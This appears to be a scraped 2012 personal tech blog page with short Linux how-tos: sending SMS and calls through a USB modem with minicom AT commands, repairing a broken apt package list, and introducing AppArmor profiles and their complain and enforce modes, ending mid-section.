<b>root@ubuntu:~/script# minicom -m</b><br />
<br />
Welcome to minicom 2.3<br />
<br />
OPTIONS: I18n<br />
<br />
<br />
<br />
Port /dev/ttyUSB1<br />
<br />
Press ESC,Z for help on special keys<br />
<br />
AT S7=45 S0=0 L1 V1 X4 &c1 E1 Q0<br />
<br />
OK<br />
<br />
You will get a OK prompt, which means that your minicom recognizes the USB Wifi modem. You can configure the device when in OK prompt using a combination of keys i.e. Press Ctrl and A together and release.Then press Z for the menu. In the menu you should press O to configure minicom.<br />
<br />
One of the important settings is the port settings. In my case it is set at /dev/ttyUSB1. In case you need to terminal into a Ciso router, you can try /dev/ttyS0. To do this press Ctrl and A together and release.Then press Z for the menu. In the menu you should press O to configure minicom. Select Serial Port setup<br />
<br />
<br />
<br />
Set the Bps as 115200 8N1<br />
<br />
Now let’s send a SMS to your own mobile phone. At the OK prompt in minicom type:<br />
Send a message to your handphone<br />
<br />
at+cmgf=1<br />
<br />
OK<br />
<br />
at+cmgw=”some_mobile_number”<br />
<br />
For example,<br />
<br />
at+cmgw=”12345678″<br />
<br />
> its fun<br />
<br />
><br />
<br />
Press Ctrl+Z when you finish typing your message. In my case I don’t need to type the country code +91<br />
<br />
+CMGW: 1<br />
<br />
OK<br />
<br />
at+cmss=1<br />
<br />
+CMSS: 0<br />
<br />
OK<br />
<br />
My handphone received the SMS<br />
<br />
To read the SMS,<br />
<br />
at+cmgl=”all”<br />
<br />
+CMGL: 1,”STO SENT”,”mobilenumber”,,<br />
<br />
its fun<br />
<br />
+CMGL: 0,”STO UNSENT”,”+mobilenumber”,,<br />
<br />
hello !!<br />
<br />
OK<br />
<br />
at+cmgr=0<br />
<br />
+CMGR: “STO UNSENT”,”+mobilenumber”,<br />
<br />
hello !!<br />
<br />
OK<br />
<b><br /></b>
<b><br /></b>
<b>Making calls from Modem to Mobile Pphone</b><br />
<br />
ATDmobilenumber;<br />
Reading messages on your Wifi Modem SIM Card<br />
<br />
Read all the messages<br />
<br />
at+cmgl=”all”<br />
<br />
+CMGL: 0,”REC READ”,”+91mobilenumber”,,”10/06/20,19:43:29+32″<br />
<br />
It works!<br />
<br />
+CMGL: 1,”REC UNREAD”,”+91mobilenumber”,,”10/06/21,19:03:10+32″<br />
<br />
chill<br />
<br />
The latest SMS is unread<br />
<br />
Read the SMS<br />
<br />
at+cmgr=1<br />
<br />
+CMGR: “REC READ”,”+91mobilenumber”,,”10/06/21,19:03:10+32″<br />
<br />
chill<br />
<br />
OK<br />
<br />
Now the status is read<br />
<br />
at+cmgl=”all”<br />
<br />
+CMGL: 0,”REC READ”,”+91mobilenumber”,,”10/06/20,19:43:29+32″<br />
<br />
It works!<br />
<br />
+CMGL: 1,”REC READ”,”+91mobilenumber”,,”10/06/21,19:03:10+32″<br />
<br />
chill<br />
<br />
OK</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-42428782481778810342012-12-28T14:17:00.001-08:002012-12-28T14:17:34.257-08:00Reading package lists... Error!<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY0bo43CZW_n6UBxXShC08E0oeNy7uvcwXZxW7dk0M__1nFbhLmBPteqrDoUXyvM5Zm_hhwzKVyuYU9nCzc1tOY8uzcbeezMEd4ksRJilbuSld1UJWq9sj9Cgkkj4syUYg7iNIhrTbGkqi/s1600/don_t_panic_button.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY0bo43CZW_n6UBxXShC08E0oeNy7uvcwXZxW7dk0M__1nFbhLmBPteqrDoUXyvM5Zm_hhwzKVyuYU9nCzc1tOY8uzcbeezMEd4ksRJilbuSld1UJWq9sj9Cgkkj4syUYg7iNIhrTbGkqi/s1600/don_t_panic_button.jpg" height="240" width="320" /></a></div>
<span style="font-family: Times, 'Times New Roman', serif; font-size: large;"><br /></span>
<ol style="text-align: left;">
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">rm /var/lib/dpkg/status<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">cp /var/lib/dpkg/status-old /var/lib/dpkg/status<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">rm -rf /var/lib/apt/lists/*<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">dpkg --configure -a<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">apt-get update<br /></span></li>
<li><span style="font-family: Times, 'Times New Roman', serif; font-size: large;">apt-get install -f</span></li>
</ol>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-19710843933367963452012-12-28T14:04:00.001-08:002012-12-28T14:04:09.760-08:00AppArmor<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> is a Linux Security Module implementation of name-based mandatory access controls. AppArmor confines individual programs to a set of listed files and posix 1003.1e draft capabilities.</span></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> is installed and loaded by default. It uses <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">profiles</span> of an application to determine what files and permissions the application requires. Some packages will install their own profiles, and additional profiles can be found in the <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor-profiles</span> package.</span></div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To install the <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor-profiles</span> package from a terminal prompt:</span></div>
<div class="screen" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo apt-get install apparmor-profiles</span>
</span></pre>
</div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">AppArmor profiles have two modes of execution:</span></div>
<div class="list itemizedlist" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<ul class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">Complaining/Learning: profile violations are permitted and logged. Useful for testing and developing new profiles.</span></div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 0px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">Enforced/Confined: enforces profile policy as well as logging the violation.</span></div>
</li>
</ul>
</div>
</div>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<br />
<div class="hgroup" style="background-color: white; border-bottom-color: rgb(204, 193, 193); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<h2 class="title" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 28px; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif; font-size: small;">Using AppArmor</span></h2>
</div>
<div class="region" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div class="contents" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">The <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor-utils</span> package contains command line utilities that you can use to change the <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> execution mode, find the status of a profile, create new profiles, etc.</span></div>
<div class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<ul class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor_status</span> is used to view the current status of AppArmor profiles.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo apparmor_status</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">aa-complain</span> places a profile into <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">complain</span> mode.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo aa-complain /path/to/bin</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">aa-enforce</span> places a profile into <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">enforce</span> mode.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo aa-enforce /path/to/bin</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">The <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d</span> directory is where the AppArmor profiles are located. It can be used to manipulate the <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">mode</span> of all profiles.</span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">Enter the following to place all profiles into complain mode:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo aa-complain /etc/apparmor.d/*</span>
</span></pre>
</div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To place all profiles in enforce mode:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
